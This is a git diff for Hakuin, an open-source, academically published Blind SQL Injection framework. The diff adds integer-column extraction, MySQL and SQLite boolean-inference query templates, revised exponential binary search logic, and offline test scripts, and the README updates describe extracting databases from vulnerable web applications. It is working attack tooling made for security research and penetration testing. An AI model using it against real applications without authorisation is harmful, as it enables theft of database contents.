diff --git a/README.md b/README.md index 9f8d51f..545565d 100644 --- a/README.md +++ b/README.md @@ -2,13 +2,14 @@

-Hakuin is a Blind SQL Injection (BSQLI) inference optimization and automation framework written in Python 3. It abstract away the inference logic and allows users to easily and efficiently extract textual data in databases (DB) from vulnerable web applications. To speed up the process, Hakuin uses pre-trained language models for DB schemas and adaptive language models in combination with opportunistic string guessing for DB content. +Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstract away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin uses pre-trained language models for DB schemas and adaptive language models in combination with opportunistic string guessing for textual DB content. -Hakuin been presented at academic and industrial conferences: -- [IEEE Workshop on Offsensive Technology (WOOT)](https://wootconference.org/papers/woot23-paper17.pdf), 2023 +Hakuin has been presented at esteemed academic and industrial conferences: +- [BlackHat MEA, Riyadh](https://blackhatmea.com/session/hakuin-injecting-brain-blind-sql-injection), 2023 - [Hack in the Box, Phuket](https://conference.hitb.org/hitbsecconf2023hkt/session/hakuin-injecting-brains-into-blind-sql-injection/), 2023 +- [IEEE S&P Workshop on Offsensive Technology (WOOT)](https://wootconference.org/papers/woot23-paper17.pdf), 2023 -Also, make sure to read our [paper](https://github.com/pruzko/hakuin/blob/main/publications/Hakuin_WOOT_23.pdf) or see the [slides](https://github.com/pruzko/hakuin/blob/main/publications/Hakuin_HITB_23.pdf). +More information can be found in our [paper](https://github.com/pruzko/hakuin/blob/main/publications/Hakuin_WOOT_23.pdf) and [slides](https://github.com/pruzko/hakuin/blob/main/publications/Hakuin_HITB_23.pdf). ## Installation @@ -48,9 +49,9 @@ class ContentRequester(Requester): return 'found' in r.content.decode() ``` -To start infering data, use the `Extractor` class. It requires a `DBMS` object to contruct queries and a `Requester` object to inject them. Currently, Hakuin supports SQLite and MySQL DBMSs, but will soon include more options. If you wish to support another DBMS, implement the `DBMS` interface defined in `hakuin/dbms/DBMS.py`. +To start extracting data, use the `Extractor` class. It requires a `DBMS` object to contruct queries and a `Requester` object to inject them. Currently, Hakuin supports SQLite and MySQL DBMSs, but will soon include more options. If you wish to support another DBMS, implement the `DBMS` interface defined in `hakuin/dbms/DBMS.py`. -##### Example 1 - Inferring SQLite DBs +##### Example 1 - Extracting SQLite DBs ```python from hakuin.dbms import SQLite from hakuin import Extractor, Requester @@ -58,43 +59,43 @@ from hakuin import Extractor, Requester class StatusRequester(Requester): ... -exf = Extractor(requester=StatusRequester(), dbms=SQLite()) +ext = Extractor(requester=StatusRequester(), dbms=SQLite()) ``` -##### Example 2 - Inferring MySQL DBs +##### Example 2 - Extracting MySQL DBs ```python from hakuin.dbms import MySQL ... -exf = Extractor(requester=StatusRequester(), dbms=MySQL()) +ext = Extractor(requester=StatusRequester(), dbms=MySQL()) ``` -Now that eveything is set, you can start inferring DB schemas. +Now that eveything is set, you can start extracting DB schemas. -##### Example 1 - Inferring DB Schemas +##### Example 1 - Extracting DB Schemas ```python # strategy: # 'binary': Use binary search # 'model': Use pre-trained models -schema = exf.extract_schema(strategy='model') +schema = ext.extract_schema(strategy='model') ``` -##### Example 2 - Inferring DB Schemas with Metadata +##### Example 2 - Extracting DB Schemas with Metadata ```python # metadata: # True: Detect column settings (data type, nullable, primary key) # False: Pass -schema = exf.extract_schema(strategy='model', metadata=True) +schema = ext.extract_schema(strategy='model', metadata=True) ``` -##### Example 3 - Inferring only Table/Column Names +##### Example 3 - Extracting only Table/Column Names ```python -tables = exf.extract_table_names(strategy='model') -columns = exf.extract_column_names(table='users', strategy='model') +tables = ext.extract_table_names(strategy='model') +columns = ext.extract_column_names(table='users', strategy='model') ``` Once you know the schema, you can extract the actual content. -##### Example 1 - Inferring Textual Columns +##### Example 1 - Extracting Textual Columns ```python # strategy: # 'binary': Use binary search @@ -102,7 +103,12 @@ Once you know the schema, you can extract the actual content. # 'unigram': Use unigram model # 'dynamic': Dynamically identify the best strategy. This setting # also enables opportunistic guessing. -res = exfiltrate_text_data(table='users', column='address', strategy='dynamic'): +res = ext.extract_column_text(table='users', column='address', strategy='dynamic'): +``` + +##### Example 2 - Extracting Integer Columns +```python +res = ext.extract_column_int(table='users', column='id'): ``` More examples can be found in the `tests` directory. @@ -110,7 +116,7 @@ More examples can be found in the `tests` directory. ## For Researchers -This repository is maintained to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the [frozen version](https://zenodo.org/record/7804243) as it contains the original code, experiment scripts, and an instruction manual for reproducing the results. +This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the [frozen version](https://zenodo.org/record/7804243) as it contains the original code, experiment scripts, and an instruction manual for reproducing the results. #### Cite Hakuin diff --git a/hakuin/Extractor.py b/hakuin/Extractor.py index 8f81a5a..df97a53 100644 --- a/hakuin/Extractor.py +++ b/hakuin/Extractor.py @@ -25,7 +25,7 @@ class Extractor: models with Huffman trees Returns: - list: List of extracted table names + list: list of extracted table names ''' allowed = ['binary', 'model'] assert strategy in allowed, f'Invalid strategy: {strategy} not in {allowed}' @@ -35,8 +35,10 @@ class Extractor: n_rows = search_alg.IntExponentialBinarySearch( requester=self.requester, query_cb=self.dbms.TablesQueries.rows_count, + lower=0, upper=8, - find_range=True, + find_lower=False, + find_upper=True, ).run(ctx) if strategy == 'binary': @@ -61,7 +63,7 @@ class Extractor: models with Huffman trees Returns: - list: List of extracted column names + list: list of extracted column names ''' allowed = ['binary', 'model'] assert strategy in allowed, f'Invalid strategy: {strategy} not in {allowed}' @@ -71,8 +73,10 @@ class Extractor: n_rows = search_alg.IntExponentialBinarySearch( requester=self.requester, query_cb=self.dbms.ColumnsQueries.rows_count, + lower=0, upper=8, - find_range=True, + find_lower=False, + find_upper=True, ).run(ctx) if strategy == 'binary': @@ -137,7 +141,7 @@ class Extractor: return schema - def extract_column(self, table, column, strategy='dynamic', charset=None, n_rows_guess=128): + def extract_column_text(self, table, column, strategy='dynamic', charset=None, n_rows_guess=128): '''Extracts text column. Params: @@ -152,7 +156,7 @@ class Extractor: n_rows_guess (int|None): approximate number of rows when 'n_rows' is not set Returns: - list: List of strings in the column + list: list of strings in the column ''' allowed = ['binary', 'unigram', 'fivegram', 'dynamic'] assert strategy in allowed, f'Invalid strategy: {strategy} not in {allowed}' @@ -161,8 +165,10 @@ class Extractor: n_rows = search_alg.IntExponentialBinarySearch( requester=self.requester, query_cb=self.dbms.RowsQueries.rows_count, + lower=0, upper=n_rows_guess, - find_range=True, + find_lower=False, + find_upper=True, ).run(ctx) if strategy == 'binary': @@ -185,3 +191,30 @@ class Extractor: queries=self.dbms.RowsQueries, charset=charset, ).run(ctx, n_rows) + + + def extract_column_int(self, table, column, n_rows_guess=128): + '''Extracts text column. + + Params: + table (str): table name + column (str): column name + n_rows_guess (int|None): approximate number of rows when 'n_rows' is not set + + Returns: + list: list of integers in the column + ''' + ctx = search_alg.Context(table, column, None, None) + n_rows = search_alg.IntExponentialBinarySearch( + requester=self.requester, + query_cb=self.dbms.RowsQueries.rows_count, + lower=0, + upper=n_rows_guess, + find_lower=False, + find_upper=True, + ).run(ctx) + + return collect.IntCollector( + requester=self.requester, + queries=self.dbms.RowsQueries, + ).run(ctx, n_rows) diff --git a/hakuin/collectors.py b/hakuin/collectors.py index 6edb1cb..288a9be 100644 --- a/hakuin/collectors.py +++ b/hakuin/collectors.py @@ -60,6 +60,22 @@ class Collector(metaclass=ABCMeta): raise NotImplementedError() +class IntCollector(Collector): + '''Collector for integer columns''' + def __init__(self, requester, queries): + super().__init__(requester, queries) + + + def collect_row(self, ctx): + return IntExponentialBinarySearch( + requester=self.requester, + query_cb=self.queries.int, + lower=0, + upper=128, + find_lower=True, + find_upper=True, + ).run(ctx) + class TextCollector(Collector): '''Collector for text columns.''' @@ -218,7 +234,8 @@ class BinaryTextCollector(TextCollector): query_cb=self.queries.char_unicode, lower=ASCII_MAX + 1, upper=UNICODE_MAX + 1, - find_range=False, + find_lower=False, + find_upper=False, correct=correct_ord, ) res = search_alg.run(ctx) diff --git a/hakuin/dbms/MySQL.py b/hakuin/dbms/MySQL.py index 012f975..0e0138c 100644 --- a/hakuin/dbms/MySQL.py +++ b/hakuin/dbms/MySQL.py @@ -293,6 +293,16 @@ class MySQLRowsQueries(UniformQueries): return self.normalize(query) + def int(self, ctx, n): + query = f''' + SELECT {MySQL.escape(ctx.column)} < {n} + FROM {MySQL.escape(ctx.table)} + LIMIT 1 + OFFSET {ctx.row} + ''' + return self.normalize(query) + + class MySQL(DBMS): DATA_TYPES = [ diff --git a/hakuin/dbms/SQLite.py b/hakuin/dbms/SQLite.py index cb41a03..298dd83 100644 --- a/hakuin/dbms/SQLite.py +++ b/hakuin/dbms/SQLite.py @@ -278,6 +278,14 @@ class SQLiteRowsQueries(UniformQueries): return self.normalize(query) + def int(self, ctx, n): + query = f''' + SELECT {SQLite.escape(ctx.column)} < {n} + FROM {SQLite.escape(ctx.table)} + LIMIT 1 + OFFSET {ctx.row} + ''' + return self.normalize(query) diff --git a/hakuin/search_algorithms.py b/hakuin/search_algorithms.py index 3a73fb9..732a0ba 100644 --- a/hakuin/search_algorithms.py +++ b/hakuin/search_algorithms.py @@ -44,7 +44,7 @@ class SearchAlgorithm(metaclass=ABCMeta): class IntExponentialBinarySearch(SearchAlgorithm): '''Exponential and binary search for integers.''' - def __init__(self, requester, query_cb, lower=0, upper=16, find_range=True, correct=None): + def __init__(self, requester, query_cb, lower=0, upper=16, find_lower=False, find_upper=True, correct=None): '''Constructor. Params: @@ -52,13 +52,15 @@ class IntExponentialBinarySearch(SearchAlgorithm): query_cb (function): query construction function lower (int): lower bound of search range upper (int): upper bound of search range - find_range (bool): exponentially expands range until the correct value is within + find_lower (bool): exponentially expands the lower bound until the correct value is within + find_upper (bool): exponentially expands the upper bound until the correct value is within correct (int|None): correct value. If provided, the search is emulated ''' super().__init__(requester, query_cb) self.lower = lower self.upper = upper - self.find_range = find_range + self.find_lower = find_lower + self.find_upper = find_upper self.correct = correct self.n_queries = 0 @@ -74,29 +76,42 @@ class IntExponentialBinarySearch(SearchAlgorithm): ''' self.n_queries = 0 - if self.find_range: - lower, upper = self._find_range(ctx, lower=self.lower, upper=self.upper) - else: - lower, upper = self.lower, self.upper + if self.find_lower: + self._find_lower(ctx, self.upper - self.lower) + if self.find_upper: + self._find_upper(ctx, self.upper - self.lower) - return self._search(ctx, lower, upper) + return self._search(ctx, self.lower, self.upper) - def _find_range(self, ctx, lower, upper): - '''Exponentially expands the search range until the correct value is within. + def _find_lower(self, ctx, step): + '''Exponentially expands the lower bound until the correct value is within. Params: ctx (Context): extraction context - lower (int): lower bound - upper (int): upper bound - - Returns: - int: correct upper bound + step (int): initial step ''' - if self._query(ctx, upper): - return lower, upper + if not self._query(ctx, self.lower): + return - return self._find_range(ctx, upper, upper * 2) + self.upper = self.lower + self.lower -= step + self._find_lower(ctx, step * 2) + + + def _find_upper(self, ctx, step): + '''Exponentially expands the upper bound until the correct value is within. + + Params: + ctx (Context): extraction context + step (int): initial step + ''' + if self._query(ctx, self.upper): + return + + self.lower = self.upper + self.upper += step + self._find_upper(ctx, step * 2) def _search(self, ctx, lower, upper): diff --git a/logo.png b/logo.png index 3c1e6af..fc3c6db 100644 Binary files a/logo.png and b/logo.png differ diff --git a/tests/dbs/data_types.sqlite b/tests/dbs/data_types.sqlite new file mode 100644 index 0000000..0b27c4a Binary files /dev/null and b/tests/dbs/data_types.sqlite differ diff --git a/tests/test_data_types.py b/tests/test_data_types.py new file mode 100644 index 0000000..4cfe1c1 --- /dev/null +++ b/tests/test_data_types.py @@ -0,0 +1,28 @@ +import json +import logging + +import hakuin +from hakuin import Extractor +from hakuin.dbms import SQLite + +from OfflineRequester import OfflineRequester + + + +logging.basicConfig(level=logging.INFO) + + + +def main(): + requester = OfflineRequester(db='data_types', verbose=True) + ext = Extractor(requester=requester, dbms=SQLite()) + + # res = ext.extract_schema(strategy='binary') + # print(res) + + res = ext.extract_column_int('data_types', 'integer') + + + +if __name__ == '__main__': + main() diff --git a/tests/test_large_content.py b/tests/test_large_content.py index 677c5a7..7eae326 100644 --- a/tests/test_large_content.py +++ b/tests/test_large_content.py @@ -25,7 +25,7 @@ def main(): ext = Extractor(requester=requester, dbms=SQLite()) if len(sys.argv) == 3: - res = ext.extract_column(sys.argv[1], sys.argv[2]) + res = ext.extract_column_text(sys.argv[1], sys.argv[2]) print('Total requests:', requester.n_queries) print('Average RPC:', requester.n_queries / len(''.join(res))) else: @@ -43,7 +43,7 @@ def main(): # measure rpc for table, columns in rpc.items(): for column in columns: - res = ext.extract_column(table, column) + res = ext.extract_column_text(table, column) res_len = len(''.join(res)) col_rpc = requester.n_queries / len(''.join(res)) rpc[table][column] = (requester.n_queries, col_rpc) diff --git a/tests/test_large_schema.py b/tests/test_large_schema.py index 60bf245..ba41ea3 100644 --- a/tests/test_large_schema.py +++ b/tests/test_large_schema.py @@ -13,7 +13,7 @@ logging.basicConfig(level=logging.INFO) def main(): - requester = OfflineRequester(db='large_schema') + requester = OfflineRequester(db='large_schema', verbose=False) ext = Extractor(requester=requester, dbms=SQLite()) res = ext.extract_schema() diff --git a/tests/test_online.py b/tests/test_online.py index 20b44ff..fcd9cc1 100644 --- a/tests/test_online.py +++ b/tests/test_online.py @@ -47,7 +47,8 @@ def main(): res = ext.extract_schema(strategy='model', metadata=True) print(json.dumps(res, indent=4)) else: - res = ext.extract_column(table, column) + res = ext.extract_column_text(table, column) + # res = ext.extract_column_int(table, column) print(json.dumps(res, indent=4)) diff --git a/tests/test_unicode.py b/tests/test_unicode.py index 310856c..92cef07 100644 --- a/tests/test_unicode.py +++ b/tests/test_unicode.py @@ -20,7 +20,7 @@ def main(): res = ext.extract_schema(strategy='binary') print(res) - res = ext.extract_column('Ħ€ȽȽ©', 'ŴǑȒȽƉ') + res = ext.extract_column_text('Ħ€ȽȽ©', 'ŴǑȒȽƉ')